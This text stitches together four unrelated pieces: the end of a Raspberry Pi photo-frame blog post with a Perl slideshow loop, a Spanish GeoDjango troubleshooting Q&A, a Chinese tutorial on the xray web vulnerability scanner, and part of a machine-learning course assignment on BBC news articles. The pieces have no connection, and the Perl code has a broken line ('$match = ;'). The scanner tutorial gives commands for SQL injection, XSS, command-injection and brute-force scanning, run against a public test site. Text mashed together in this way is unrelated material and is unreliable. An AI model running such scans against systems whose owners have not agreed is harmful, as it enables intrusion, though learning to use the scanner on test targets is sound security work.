for (;;) {
# then start slide show
# shell echo cannot work with null character so we need to use a file to store it
#system("cat $picNames|xargs -0 qiv -DfRsmi -d $delay \&");
system("sudo xargs -a $mshow -0 fbi -a --noverbose -1 -T 1 -t $delay ");
# fbi runs in background, then exits, so we need to monitor if it's still alive
# wait appropriate estimated amount of time, then look aggressively for fbi
sleep($delay*($cn - 2));
for(;;) {
open(MON,"ps -ef|grep fbi|grep -v grep|") || die "Cannot launch ps -ef!!\n";
$match = ;
if ($match) {
print "got fbi match\n" if $DEBUG > 1;
} else {
print "no fbi match\n" if $DEBUG;
# fbi not found
last;
}
close(MON);
print "usleeping, noexist is $noexit\n" if $DEBUG > 1;
usleep($mdelay);
} # end loop testing if fbi has exited
} # close of infinite loop
You’ll need to make these files executable. Something like this should work:
$ chmod +x *.py *.pl *.sh
My crontab file looks like this (you edit crontab using the crontab -e command):
@reboot sleep 25; cd ~ ; ./m2.pl >> ./m2.log 2>&1 24 16 * * * ./master.sh >> ./master.log 2>&1
This invokes master.sh once a day at 4:24 PM to refresh the 60 photos. My refresh took about 13 minutes the other day, but the old slideshow keeps playing until almost the last second, so it’s OK.
The nice thing about this approach is that fbi works with a lightweight OS – Raspbian Lite is fine, you’ll just need to install a few packages. My SD card is unstable or something, so I have to re-install the OS periodically. An install of Raspberry Pi Lite on my RPi 4 took 11 minutes. Anyway, fbi is installed via:
$ sudo apt-get install fbi
But if your RPi is freshly installed, you may first need to do a
$ sudo apt-get update && sudo apt-get upgrade
python image manipulation
The drawback of this approach, i.e., not using qiv, is that we gotta do some image manipulation, for which python is the best candidate. I’m going by memory. I believe I installed python3, perhaps as sudo apt-get install python3. Then I needed pip3: sudo apt-get install python3-pip. Then I needed to install Pillow using pip3: sudo pip3 install Pillow.
m2.pl refers to a black.jpg file. It’s not a disaster to not have that, but under some circumstances it may help. There it is!
Many of my photos do not have EXIF information, yet they can still be displayed. So for those photos running getinfo.py will produce an error (but the processing of the other photos will continue.)
I was originally rotating the display 90 degrees as needed to display the photos with the using the maximum amount of display real estate. But that all broke when I tried to revive it. And the cheap servo motor was noisy. But folks were pretty impressed when I demoed it, because I did it get it the point where it was indeed working correctly.
Picture selection methodology
There are 20 “folders” (random numbers) of three triplets each. The idea is to give you additional context to help jog your memory. The triplets, with some luck, will often be from the same time period.
I observed how many similar pictures are adjacent to each other amongst our total collection. To avoid identical pictures, I require the pictures to be five minutes apart in time. Well, I cheated. I don’t pull out the timestamp from the EXIF data as I should (at least not yet – future enhancement, perhaps). But I rely on a file-naming convention I notice is common – 20201227_134508.jpg, which basically is a timestamp-encoded name. The last six digits are HHMMSS in case it isn’t clear.
Rclone
You must install the rclone package, sudo apt-get install rclone.
Can you configure rclone on a headless Raspberry Pi?
Indeed you can. I know because I just did it. You enable your Pi for ssh access. do the rclone-config (or whatever it’s called) using putty from a Windows 10 system. You’ll get a long Google URL in the course of configuring that you can paste into your browser. You verify it’s you, log into your Google account. Then you get back a url like http://127.0.0.1:5462/another-long-url-string. Well, put that url into your clipboard and in another login window, enter curl clipboard_contents
That’s what I did, not certain it would work, but I saw it go through in my rclone-config window, and that was that!
Don’t want to deal with rclone?
So you want to use a traditional flash drive you plug in to a USB port, just like you have for the commerical photo frames, but you otherwise like my approach of randomizing the picture selection each day? I’m sure that is possible. A mid-level linux person could rip out the rclone stuff I have embedded and replace as needed with filesystem commands. I’m imagining a colossal flash drive with all your tens of thousands of pictures on it where my random selection still adds value. If this post becomes popular enough perhapsI will post exactly how to do it.
Getting started with this
After you’ve done all that, and want to try it out. you can run
$ ./master.sh
First you should see a file called files growing in size – that’s rclone doing its listing. That takes a few minutes. Then it generates random numbers for photo selection – that’s very fast, maybe a second. Then it slowly copies over the selected images to a temporary folder called Picturestmp. That’s the slowest part. If you do a directory listing you should see the number of images in that directory growing slowly, adding maybe three per minute until it reaches 60 of them. Finally the rotation are applied. But even if you didn’t set up your python environment correctly, it doesn’t crash. It effectively skips the rotations. A rotation takes a couple seconds per image. Finally all the images are copied over to the production area, the directory called Pictures; the old slideshow program is “killed,” and the new slideshow starts up. Whole process takes around 15 minutes.
I highly recommend running master.sh by hand as just described to make sure it all works. Probably some of it won’t. I don’t specialize in making recipes, more just guidance. But if you’re feeling really bold you can just power it up and wait a day (because initially you won’t have any pictures in your slideshow) and pray that it all works.
Still missing
I’d like to display a transition image when switching from the current set of photos to the new ones.
Suppressing boot up messages might be nice for some. Personally I think they’re kind of cool – makes it look like you’ve done a lot more techie work than you actually have!
You’re going to get some junk images. I’ve seen where an image is a thumbnail (I guess) and gets blown up full screen so that you see these giant blocks of pixels. I could perhaps magnify those kind of images less.
Movies are going to be tricky so let’s not even go there…
I was thinking about making it a navigation-enabled photo frame, such as integration with a Gameboy controller. You could do some really awesome stuff: Pause this picture; display the location (town or city) where this photo was taken; refresh the slideshow. It sounds fantastical, but I don’t think it’s beyond the capability of even modestly capable hobbyist programmers such as myself.
I may still spin the frame 90 degrees this way an that. I have the servo mounted and ready. Just got to revive the control commands for it.
References and related
This 7″ display is a little small, but it’s great to get you started. It’s $64 at Amazon: Amazon.com: Raspberry Pi 7″ Touch Screen Display: Electronics
I have an older approach using qiv which I lost the files for, and my blog post got corrupted. Hence this new approach.
My advanced slideshow treatment is beginning to take shape. I just add to it while I develop it, so check it periodically if that is of interest. Raspberry Pi advanced photo frame.
|
Django v1.11.5
Estoy intentando instalar GeoDjango para jugar con GoogleMaps.
Instalé la aplicación PostgreSQL para MAC e instalé pip install psycopg2 . También utilicé home-brew para instalar GDAL.
Ajustes editados.py para agregar:
DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'djangodb', 'USER': 'admin', 'PASSWORD': '', 'HOST': 'localhost', 'PORT': '5432', } }
Sin embargo, cuando ejecuto python manage.py obtengo: AttributeError: 'DatabaseOperations' object has no attribute 'geo_db_type'
CREATE DATABASE djangodb OWNER admin; al usuario usando: CREATE DATABASE djangodb OWNER admin;
Error completo:
Ejecutando migraciones: Aplicando usuarios. Ubicación_1111 … Rastreo (última llamada más reciente): Archivo “manage.py”, línea 22, en execute_from_command_line (sys.argv) Archivo “/ Applications / Anaconda / anaconda / envs / DjangoEnv / lib / python3.6 / site-packages / django / core / management /
init.py “, línea 364, en execute_from_command_line utility.execute () Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site- packages / django / core / management /init.py “, línea 356, en execute self.fetch_command (subcomando) .run_from_argv (self.argv) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/ site-packages / django / core / management / base.py “, línea 283, en run_from_argv self.execute (* args, ** cmd_options) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/ site-packages / django / core / management / base.py “, línea 330, en execute output = self.handle (* args, ** opciones) Archivo” / Aplicaciones / Anaconda / anaconda / envs / DjangoEnv / lib / python3. 6 / site-packages / django / core / management / commands / migrate.py “, línea 2 04, in handle fake_initial = fake_initial, File “/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/executor.py”, línea 115, en estado migrate = self ._migrate_all_forwards (state, plan, full_plan, fake = fake, fake_initial = fake_initial) Archivo “/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/executor/ , línea 145, en _migrate_all_forwards state = self.apply_migration (state, migration, fake = fake, fake_initial = fake_initial) File “/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/ /migrations/executor.py “, línea 244, en apply_migration state = migration.apply (state, schema_editor) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/ migrations / migration.py “, línea 129, en apply operation.database_forwards (self.app_label, schema_editor, old_state, project_state) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packa ges / django / db / migrations / operations / models.py “, línea 97, en database_forwards schema_editor.create_model (model) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django /db/backends/base/schema.py “, línea 254, en la definición de create_model, extra_params = self.column_sql (modelo, campo) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site- packages / django / db / backends / base / schema.py “, línea 144, en column_sql db_params = field.db_parameters (connection = self.connection) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6 / site-packages / django / db / models / fields /init.py “, línea 662, en db_parameters type_string = self.db_type (conexión) Archivo” /Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/ site-packages / django / contrib / gis / db / models / fields.py “, línea 126, en db_type return connection.ops.geo_db_type (self) AttributeError: El objeto ‘DatabaseOperations’ no tiene atributo ‘geo_db_type’
Preguntas similares que probé: el objeto de obtener ‘DatabaseOperations’ no tiene ningún atributo ‘geo_db_type’ error al hacer un syncdb
Debe cambiar la configuración de DATABASES para usar el backend de postgis,
'ENGINE': 'django.contrib.gis.db.backends.postgis',
y agregue 'django.contrib.gis' , a INSTALLED_APPS .
|
原文地址:
长亭科技的xray扫描器的扫描效果还不错,在国内颇受好评,很有幸以前在长亭科技工作,技术氛围很好。扯得有点远了,话不多说,本文是是xray国光的学习记录,也可以当做新手的xray教程来用,不过我还是建议大家看看官方文档,只是国光我最近喜欢上了这种学习记录的感觉,学习效率很高。
简介
长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。
基本使用
代理模式
代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。
生成ca证书
Bash
# 生成 ca 证书➜ ./xray genca# 在当前文件夹生成 ca.crt 和 ca.key 两个文件➜ lsca.crt ca.key config.yaml xray
将生成的ca证书导入到需要代理的设备即可,这样就可以方便代理https的流量了
启用代理
第一次启动 xray 之后,当前目录会生成 config.yml 配置文件,选择文件编辑器打开,并按照下方说明修改。定位搜索到如下内容,将* 改为 testphp.vulnweb.com,这是AWVS的官方靶场,方便检测漏扫能力。 Yaml
# 配置解释见 https://chaitin.github.io/xray/#/configration/mitm
mitm:
...
restriction:
includes: # 允许扫描的域,此处无协议
- 'testphp.vulnweb.com' # 表示允许所有的域名和 path
...
监听本地的7777端口,并设置漏洞报告的输出的文件名为:xray-testphp.html Bash
➜ ./xray webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html
配置代理
Chrome下的SwitchyOmega插件很方便添加各种代理,将xray的代理添加进来,然后浏览器开启xray代理即可:
开始扫描
使用刚刚设置过代理的Chrome浏览器访问:http://testphp.vulnweb.com
然后就可以看到 xray 界面开始输出漏洞信息,在用户和网站交互的时候,期间的链接xray都会进行安全检查,然后生成对应的漏洞报告:
下面是几个快速链接,可以点击用于体验更多的漏洞类型的扫描
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/artists.php?artist=2
http://testphp.vulnweb.com/redir.php?r=http://www.w3.org
可以在上面设置的输出格式里面看到对应的漏洞检测结果报告:wow awesome
爬虫模式
爬虫模式是模拟人工去点击网页的链接,然后去分析扫描,和代理模式不同的是,爬虫不需要人工的介入,访问速度要快很多,但是也有一些缺点需要注意。
xray 的基础爬虫不能处理 js 渲染的页面
需要首先人工配置登录 cookie,必需的 http 头等,如果登录失败,也不容易发现问题
Bash
➜ ./xray webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler-testphp.html
在这个模式下,相当于主动扫描模式,自主分析页面的链接,然后自动探测是否有漏洞。
服务扫描
xray也支持服务扫描,目前的服务扫描的POC还不够多,目前只有一个 tomcat-cve-2020-1938 ajp 协议任意文件检测poc。
参数配置目前比较简单,支持单个扫描与批量扫描: Bash
# 快速检测单个目标
➜ ./xray servicescan --target 127.0.0.1:8009
# 批量检查的 1.file 中的目标, 一行一个目标,带端口
➜ ./xray servicescan --target-file test.file
其中 test.file 的格式为一个行一个 service,如
10.3.0.203:8009127.0.0.1:8009
也可以将结果输出到报告中,支持多种格式: Bash
# 将检测结果输出到 html 报告中
➜ ./xray servicescan --target 127.0.0.1:8009 --html-output service.html
➜ ./xray servicescan --target-file test.file --html-output service.html
# 将检测结果输出到 json 文件中
➜ ./xray servicescan --target 127.0.0.1:8099 --json-output service.json
完整的servicescan用法可以使用下面命令查看: Shell
➜ ./xray servicescan --help
NAME:
servicescan - Run a service scan task
USAGE:
servicescan [command options] [arguments...]
OPTIONS:
--target value specify the target, for example: host:8009
--target-file value load targets from a local file, one target a line
--json-output FILE output xray results to FILE in json format
--webhook-output value post xray result to url in json format
--html-output FILE output xray result to FILE in HTML format
部署完成后,使用xray来检测看一下效果怎么样:
配置
命令详解
查看 -h 基本上我们搞安全的 基本上应该都很容易理解了: Shell
➜ ./xray -h
USAGE:
[global options] command [command options] [arguments...]
COMMANDS:
webscan Run a webscan task
servicescan Run a service scan task
poclint lint yaml poc
reverse Run a standalone reverse server
genca Generate CA certificate and key
upgrade check new version and upgrade self if any updates found
version Show version info
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--config FILE Load configuration from FILE
--log_level value Log level, choices are debug, info, warn, error, fatal
--help, -h show help
GLOBAL OPTIONS
全局配置 如果在这指定了,那么所有命令执行的时候都会生效 Bash
# 用于指定配置文件的位置,默认加载同目录的 config.yaml--config FILE Load configuration from FILE# 用于指定全局的日志配置,默认为info, 可以设置为debug查看更详细的信息--log_level value Log level, choices are debug, info, warn, error, fatal--help, -h show help
全局配置的使用时需要紧跟二进制程序,如: Bash
# 正确的用法➜ ./xray --log_level debug --config my.yaml webscan --url xxx# 错误的用法 全局配置没有紧跟二进制程序➜ ./xray webscan --log_level debug --config my.yaml --url xxx
COMMANDS
命令 说明
webscan xray核心功能,用来发现探测Web漏洞
servicescan 服务扫描功能 用来探测服务漏洞
poclint 检测poc是否符合规范
reverse 启动单独的盲打平台服务
genca 用于快速生成一个根证书,主要用于被动代理扫描HTTPS流量时用到
upgrade 检查新版本并自动升级
version 版本信息
help 显示命令列表或一个命令的帮助
subdomain 子域名扫描 高级本才有的命令
subdomain
扫描 example.com,并将结果输出到 example.txt Bash
➜ ./xray subdomain --target example.com --text-output example.txtCopyErrorCopied
扫描 example.com,并使用 console ui 交互式界面,同时记录结果到 example.txt Bash
➜ ./xray subdomain --target example.com --console-ui --text-output example.txt
webscan
运行 ./xray -h,可以看到 Bash
➜ xray ./xray webscan -h
NAME:
webscan - Run a webscan task
USAGE:
webscan [command options] [arguments...]
OPTIONS:
--plugins value specify the plugins to run, separated by ','
--poc value specify the poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr
--basic-crawler value use a basic spider to crawl the target and scan the results
--url-file FILE read urls from a local file and scan these urls
--url value scan a **single** url
--data value data string to be sent through POST (e.g. 'username=admin')
--raw-request FILE load http raw request from a FILE
--json-output FILE output xray results to FILE in json format
--html-output FILE output xray result to FILE in HTML format
--webhook-output value post xray result to url in json format
扫描插件
--plugins: 指定要运行的插件,使用,分隔
Shell
--plugins xss--plugins xss,sqldet,phantasm
--poc:配置本次扫描启用哪些POC,使用,分隔
Bash
# 只加载一个 POC, 精准匹配
--plugins phantasm --poc poc-yaml-thinkphp5-controller-rce
# 加载内置的所有带 `thinkphp` 的 POC
--plugins phantasm --poc "*thinkphp*"
# 加载本地 `/home/test/pocs/` 目录所有的 POC:
--plugins phantasm --poc "/home/test/pocs/*"
# 加载 `/home/test/pocs/` 下包含 thinkphp 的 POC
--plugins phantasm --poc "/home/test/pocs/*thinkphp*"
该参数支持Glob表达式批量加载,规则还是很灵活的。
输入来源
--listen: 启动一个被动代理服务器作为输入,如--listen 127.0.0.1:7777
--basic-crawler: 启用一个基础爬虫作为输入, 如--basic-crawler http://example.com
--url-file: 批量从文件中读取URL
--url: 用于快速测试单个URL,不带爬虫,默认为GET请求
--data:指定 data,同时变为POST请求
--raw-request: 加载一个原始的 HTTP 请求并用于扫描,类似于sqlmap -r
输出格式
--json-output: 将结果输出到一个 json 文件中,输出是JSON格式的结构化数据
--html-output: 将结果输出为 html 报告
--webhook-output: 将结果发送到一个地址,输出是JSON格式的结构化数据,需要自己搭建一个Web服务器,接收到xray发送的漏洞信息
在
--json-output和--html-otput参数中使用变量__timestamp__和__datetime__,这样文件名中对应位置会自动替换为时间戳或日期时间,避免输出到同一文件时报错。如--html-output report-__datetime__.html将使用report-2019_11_01-10_03_26.html作为报告文件名。
组合使用
将上面说的一些结合起来使用,就可以满足多种场景下的使用需求了: Bash
# 使用xss模块 启用1111端口的代理服务器进行web漏洞扫描,输出漏洞报告到1.html中
➜ ./xray webscan --plugins xss --listen 127.0.0.1:1111 --html-output 1.html
# 将日志级别设置为debug 然后使用xss和命令执行插件 使用内置的爬虫来扫描,输出漏洞报告到1.json中
➜ ./xray --log_level debug webscan --plugins xss,cmd_injection --basic-crawler http://example.com --json-output 1.json
# 对目标资产进行POST方式漏洞检测,data为 x=y 并输出漏洞报告到1.json中
➜ ./xray webscan --url http://example.com --data "x=y" --html-output 2.html --json-output 1.json
# 对目标资产进行单个URL检测,路灯报告输出到指定的接受服务器中
➜ ./xray webscan --url http://example.com/ --webhook-output http://host:port/path
...
交互命令行
交互式的命令行就是新手福利了,提供命令自动补全提示,直接运行 xray 而不加任何参数即可启动交互式命令行。
配置文件
引擎初次运行时,会在当前目录内生成一个 config.yaml 文件。通过调整配置中的各种参数,可以满足不同场景下的需求。
在 xray 快速迭代时期,不保证配置文件向后兼容。如果出错,可以备份配置文件并重新生成。 实际上建议每次更新版本后都备份配置文件后删除并重新生成,以免错过新功能的配置。
插件配置
在具体插件配置之前,plugins 部分有个顶级配置项为 max_parallel, 表示插件的并发度。举个例子,如果需要处理 3 个请求,此时启用了三个插件 sqldet, xss, cmd_injection, 当设置 max_parallel 为 1 时,处理过程为: Powershell
sqldet, xss, cmd_injection 同时处理 request1sqldet, xss, cmd_injection 同时处理 request2sqldet, xss, cmd_injection 同时处理 request3
当 max_parallel 设置为 3 时,处理过程为: Shell
sql,xss,cmd_injection 同时并发(3并发)处理 request1, request2, request3
理论上时间会算缩短3倍,但这个值并非越大越好,高并发意味着同一时间发包数量大幅增加,这可能会影响远程 server 的运行和xray 对漏洞的判断,需要按需设置。
对于其他配置项,一个插件是一个配置单元,每个单元的基本格式为: Yaml
pluginName:
enabled: true/false
otherConfigrations: xxx
enabled 即为是否启用插件,所以这里只说明部分插件的特殊配置就可以了。
xss
ie_feature如果此项为 true,则会将一些只能在IE环境下复现的漏洞爆出来,小白请不要开。
include_cookie如果此项为 true, 则会检查是否存在输入源在 cookie 中的 xss
baseline
detect_outdated_ssl_version是否检测过期的 SSL 版本, 如果目标启用了 TLS1.1, TLS1.0, SSL3.0 都是会报一个漏洞
detect_http_header_config是否检查 header 的配置,主要检查一些安全相关的 http 头有没有确实或错误
detect_cors_header_config是否检查 cors 相关的问题
detect_server_error_page检查响应是不是一个错误页面, 支持主流框架的错误信息检测
detect_china_id_card_number检查响应中有没有身份证号信息
detect_serialization_data_in_params检查参数中是否存在序列化数据,支持 java,php,python
detect_cookie_password_leak检测cookie中是否存在密码泄漏
detect_unsafe_scheme检测不安全方案
detect_cookie_httponly检测cookie是否开启httponly
cmd_injection
detect_blind_injection 是否使用盲打来检查命令注入
dirscan
dictionary配置目录字典, 需要是绝对路径
dictionaryWeb字典的路径
sqldet
error_based_detection启用报错注入检测
boolean_based_detection启用布尔盲注检测
time_based_detection启用时间盲注检测
下面两个选项很危险,开启之后可以增加检测率,但是有破坏数据库数据的可能性,请务必了解工作原理之后再开启
dangerously_use_comment_in_sql允许检查注入的时候使用注释
dangerously_use_or_in_sql允许检查注入的时候使用or
brute_force
detect_default_password检测默认密码
detect_unsafe_login_method检测不安全的登录方法
username_dictionary弱口令用户名字典, 需要绝对路径
password_dictionary弱口令密码字典, 需要绝对路径
如果没有配置将使用内置字典,约 Top8 用户名和 Top80 密码。配置后将做字典合并,即用户字典的与内置的做合并并去重。
phantasm
depth探测深度, 默认为1, 即只在URL深度为0, 和深度为1时运行该插件(前提是启用了该插件)
poc定义默认启用哪些POC。支持写内置POC名字和本地文件的绝对路径,如:
Yaml
phantasm:
poc:
- poc-yaml-activemq-cve-2016-3088
- /Users/test/1.yml
这样方便自己添加自己的POC了
被动代理配置
这一部分主要介绍配置项中 mitm 部分相关的内容。
抓取HTTPS流量
对应于 ca_cert 和 ca_key 两项配置。
和 burp 类似,抓取 https 流量需要信任一个根证书,这个根证书可以自行生成,也可用下列自带的命令生成: Bash
➜ ./xray genca
运行后将在当前目录生成 ca.key 和 ca.crt, 用户手动导入证书即可,类似于BP导入证书那样。
Firefox需要单独在浏览器导入。移动端可以挂代理之后访问 http://xray/ 下载根证书
代理启用密码保护
对应于 auth 中的配置。
xray 支持给代理配置基础认证的密码,当设置好 auth 中的 username 和 password 后,使用代理时浏览器会弹框要求输出用户名密码,输入成功后代理才可正常使用。
限制漏洞扫描的范围
在 mitm 的配置中的 restrction 项指示本次漏洞的 URI 限制。
includes表示只扫描哪些域和路径。比如*.example.com只扫描example.com的子域
excludes表示不扫描哪些域和路径。比如t.example.com表示不扫描t.example.com
两个都配置的情况下会取交集,这两个配置常用于想要过滤代理中的某些域,或者只想扫描某个域的请求时。
两项配置都支持 path 过滤,如果输入的中有 /, 那么 / 后面的表达式就是 path 的过滤。可以对照如下例子理解: Yaml
includes:
- 'example.com/test' # 表示允许 example.com/test 这一个路径
- "example.com/admin*" # 表示允许 example.com 下的 /admin 开头的所有 path
注意: 这里的 includes 和 excludes 均不支持端口号,如果加上将导致限制失效!
设置代理的IP白名单
配置中的 allow_ip_range 项可以限制哪些 IP 可以使用该代理。支持单个 IP 和 CIDR 格式的地址,如: Yaml
allow_ip_range: ["127.0.0.1","192.168.1.1/24"]CopyErrorCopied
留空则允许所有地址访问,如果来源 IP 没有在配置的地址内,使用者则会报Proxy Failed的错误。
队列长度配置
Yaml
queue: max_length: 10000
经典的生产者消费者问题,如果生产消费速度不匹配,就需要一个中间的队列来临时存储,这个队列的大小就是 max_length。如果 max_length 设置的过大,会造成 xray 内存占用过大,甚至可能会造成内存不足 OOM 进程崩溃。
代理请求头配置
Yaml
proxy_header:
via: "" # 如果不为空,proxy 将添加类似 Via: 1.1 some-value-random 的 http 头
x_forwarded: false # 是否添加 X-Forwarded-{For,Host,Proto,Url} 四个 http 头
如果开启 proxy_header,代理会添加 via 头和 X-Forwarded-* 系列头。如果在请求中就已经存在了同名的 HTTP 头,那么将会追加在后面。
比如 curl http://127.0.0.1:1234 -H "Via: test" -H "X-Forwarded-For: 1.2.3.4" -v,后端实际收到的请求将会是 Http
GET / HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: curl/7.54.0
Accept: */*
Via: test, 1.1 xray-1fe7f9e5241b2b150f32
X-Forwarded-For: 1.2.3.4, 127.0.0.1
X-Forwarded-Host: 127.0.0.1:1234
X-Forwarded-Proto: http
X-Forwarded-Url: http://127.0.0.1:1234/
Accept-Encoding: gzip
代理的代理
假如启动 xray 时配置的 listen 为 127.0.0.1:1111,upstream_proxy 为 http://127.0.0.1:8080, 那么浏览器设置代理为 http://127.0.0.1:1111,整体数据流如下:
该配置仅影响代理本身,不会影响插件在漏洞探测时的发包行为
盲打平台配置
这里知识点比较多,反向盲打平台很多,如果大家对xray的这个功能感兴趣建议参考xray的官方文档,国光这里就不细写了。
HTTP配置
对于 web 扫描来说,http 协议的交互是整个过程检测过程的核心。因此这里的配置将影响到引擎进行 http 发包时的行为。
漏洞扫描用的代理 proxy
配置该项后漏洞扫描发送请求时将使用代理发送,支持 http, https 和 socks5 三种格式,如:
http://127.0.0.1:1111https://127.0.0.1:1111socks5://127.0.0.1:1080
基础爬虫配置
基础爬虫的配置项对应于 basic-crawler 部分,默认的配置如下,用法参照文件中的注释 Yaml
basic_crawler:
max_depth: 0 # 爬虫最大深度, 0 为无限制
max_count_of_links: 0 # 本次扫描总共爬取的最大连接数, 0 为无限制
allow_visit_parent_path: false # 是否允许访问父目录, 如果扫描目标为 example.com/a/, 如果该项为 false, 那么就不会爬取 example.com/ 这级目录的内容
restriction: # 和 mitm 中的写法一致, 有个点需要注意的是如果当前目标为 example.com 那么会自动添加 example.com 到 includes 中。
includes: []
excludes:
- '*google*'
子域名配置
注意,此功能只在高级版中提供
国光测试了这个子域名功能,可以用,但是不是很强大,不如自己采集多方面接口的域名要全,感兴趣可以参考官方文档。
检查更新配置
xray 内置了一个简单的更新检查机制,会在每次启动的时候检查有无新的版本发布,如果有更新将在界面上显示最新的 release notes。 如不需要该机制,可以通过下列方法禁用:
在 config.yaml 中添加如下配置即可禁用更新检查: Yaml
update:
check: false
xray 进阶
xray与Burpsuite联动
首先 xray 建立起 webscan 的监听 Bash
➜ ./xray webscan --listen 127.0.0.1:7777 --html-output bp.html
进入 Burp 后,打开 User options 标签页,然后找到 Upstream Proxy Servers 设置。
点击 Add 添加上游代理以及作用域,Destination host处可以使用*匹配多个任意字符串,?匹配单一任意字符串,而上游代理的地址则填写 xray 的监听地址。
BP的socks代理与顶级代理服务器有冲突,不能同时勾选
接下来BP正常抓包,与此同时BP也会将我们截取到的一些流量包发到xray中进行漏洞检测。
xray与AWVS联动
首先 xray 建立起 webscan 的监听
如果你的AWVS不是安装在物理机上话,那么你的xray应该填写你AWVS可以访问的地址 国光测试填写127.0.0.1 无法与AWVS进行联动
Bash
➜ ./xray webscan --listen 192.168.31.53:7777 --html-output awvs.html
以 AWVS 13 为例,登入管理页后,点击 Targets, 然后点击 Add Target 添加扫描目标:
这里演示的是扫描 awvs 的在线靶站 http://testphp.vulnweb.com/
下滑到HTTP部分,填写Proxy Server为对应的xray代理,因为国光的AWVS是在虚拟机运行的,所以我这里填写的是我物理机的ip地址(之前粗心写127.0.0.1了没有啥反应):Docker版本的AWVS国光没有成功联动过
最后扫描类型选择 仅爬取:
此时AWVS的爬虫会把请求都转发给xray检测漏洞了,此时awvs.html里面就躺好了漏洞:
Django调用xray
因为xray的新版本支持webhook这样很方便我们写代码调用,首先xray监听本地的7777端口,然后监听的流量进行漏洞检测,将漏洞信息同时通过webhook的方式传输到http://127.0.0.1:8000/scan/xray/ Bash
➜ ./xray webscan --listen 192.168.31.53:7777 --webhook-output http://127.0.0.1:8000/scan/xray/
http://127.0.0.1:8000/scan/xray/这个是国光用Django写的接口,下面是这个接口简单的实现代码: Python
import json
from django.shortcuts import render
from django.views.generic.base import View
from django.views.decorators.csrf import csrf_exempt
class WebHook(View):
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def post(self, request):
vul_data = json.loads(request.body)
if 'detail' in str(request.body):
print('漏洞插件:', vul_data['plugin'])
print('漏洞位置:', vul_data['target']['url'])
print('漏洞分类:', vul_data['vuln_class'])
return render(request, 'test.html', {
})
因为Django安全机制问题,xray post提交请求到Django必须填写CSRF Token才可以,解决方法就是手动关掉这个类的CSRF检测
@csrf_exempt
参考资料
来源: 国光
文章作者: 国光
文章链接: https://www.sqlsec.com/2020/04/xray.html
|
Assignment 6
This assignment is designed to develop your ability to process data sets, use scikit-learn models, and analyze their output. You will do this by classifying, clustering, and analyzing news articles from the BBC.
This will demonstrate the following skills:
Multi-class (more than 2 classes) classification using naïve Bayes and k-nearest neighbors classifiers
Clustering with the k-means algorithm
SciKit pipelines
Dimensionality reduction with SVD and NMF
This assignment is due midnight, November 22, 2020.Upload your solution notebook and PDF export to Blackboard.
Revision Log
November 21, 2020
Correct missing make_scorercall inGridSearchCVsnippet.
November 17, 2020
Added encoding to reading files
Fixed typo in SVD example code
Added note about removing stop words
November 16, 2020
Fixed typo in MultinomialNBcode.
SciKit-Learn Classes
There are two different text vectorizers you will need to use:
You can also use CountVectorizer with TfidfTransformer to get the same result as TfidfVectorizer.
I recommend using the vectorizer in a pipeline with your other learning class(es).
You will need to use the following classifiers and models:
MultinomialNB, the naïve Bayes classifier.
KNeighborsClassifier, thek-nearest neighbors classifier.
KMeans, thek-means clustering algorithm.
TruncatedSVD, the dimensionality reduction algorithm.
Load and Prepare Data (20%)
Download the Raw text files for the main ‘BBC’ data set from http://mlg.ucd.ie/datasets/bbc.html. This will be a Zip file that contains text files with data.
You can read the files into a Pandas data frame with the following code:
from pathlib import Path articles = pd.DataFrame.from_records( ((f.parent.name, f.name, f.read_text(encoding='latin1')) for f in Path('bbc').glob('*/*.txt')), columns=['category', 'file', 'text'] )
This loops over all text files and reads them into records, that you then turn into a Pandas data frame.
Set aside 20% of the data for testing your classifiers.
Show the distribution of categories - how many articles are there in each category? Do this with a suitable plot.
Classification (25%)
Train a naïve Bayes classifier (MultinomialNB) to predict an article's category using its term counts.Report its accuracy on both the training and the test data.
Tip
You can do this in one shot with a pipeline consisting of a CountVectorizer followed by a MultinomialNB:
bayes_pipe = Pipeline([ ('word_count', CountVectorizer()), ('classify', MultinomialNB()) ]) bayes_pipe.fit(train['text'], train['category'])
Train a k-NN classifier (KNeighborsClassifier) with 5 neighbors on TF-IDF term vectors.Report its accuracy on both the training and the test data.You can do this with a pipeline.
Remember LogisticRegressionCV that used cross-validation on the training data to select regularization parameters?GridSearchCV lets us do that for any parameters of any model.For example:
GridSearchCV(KNeighborsClassifier(), { 'n_neighbors': [1, 2, 3, 5, 7, 10] }, scoring=make_scorer(accuracy_score))
This will select the n_neighbors with the highest cross-validation accuracy on the training data.
Train a k-NN classifier with GridSearchCV to pick the neighborhood size.Report its accuracy on both the training and test data.Does tuning the neighborhood size result in better test accuracy?
Note
Should you remove stop words? Are stop words useful for this classification task?
Dimensionality Reduction (15%)
